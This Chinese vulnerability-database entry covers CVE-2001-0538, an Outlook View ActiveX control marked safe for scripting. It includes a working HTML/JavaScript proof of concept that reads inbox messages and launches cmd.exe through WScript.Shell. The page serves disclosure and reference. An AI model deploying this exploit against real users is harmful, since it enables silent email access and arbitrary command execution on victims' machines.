Microsoft Outlook未认证电子邮件访问漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106429 漏洞类型 访问验证错误
发布时间 2001-07-12 更新时间 2005-05-02
CVE编号 CVE-2001-0538 CNNVD-ID CNNVD-200108-053
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-053
|漏洞详情
MicrosoftOutlook2002版本及之前版本中的MicrosoftOutlookViewActiveXControl存在漏洞。远程攻击者可以借助畸形HTML电子邮件消息或网页执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/3025/info

Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can access and perform operations on user email through this control without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>
|参考资料

来源:US-CERTVulnerabilityNote:VU#131569
名称:VU#131569
链接:http://www.kb.cert.org/vuls/id/131569
来源:MS
名称:MS01-038
链接:http://www.microsoft.com/technet/security/bulletin/MS01-038.asp
来源:BUGTRAQ
名称:20010712MSOfficeXP-themoremoneyIgivetoMicrosoft,themorevulnerablemyWindowscomputersare
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=99496431214078&w=2
来源:XF
名称:outlook-activex-view-control(6831)
链接:http://xforce.iss.net/static/6831.php
来源:BID
名称:3025
链接:http://www.securityfocus.com/bid/3025
来源:NTBUGTRAQ
名称:20010712VulnerabilityinIE/OutlookActiveXcontrol
链接:http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0107&L=ntbugtraq&F=P&S=&P=862
来源:CIAC
名称:L-113
链接:http://www.ciac.org/ciac/bulletins/l-113.shtml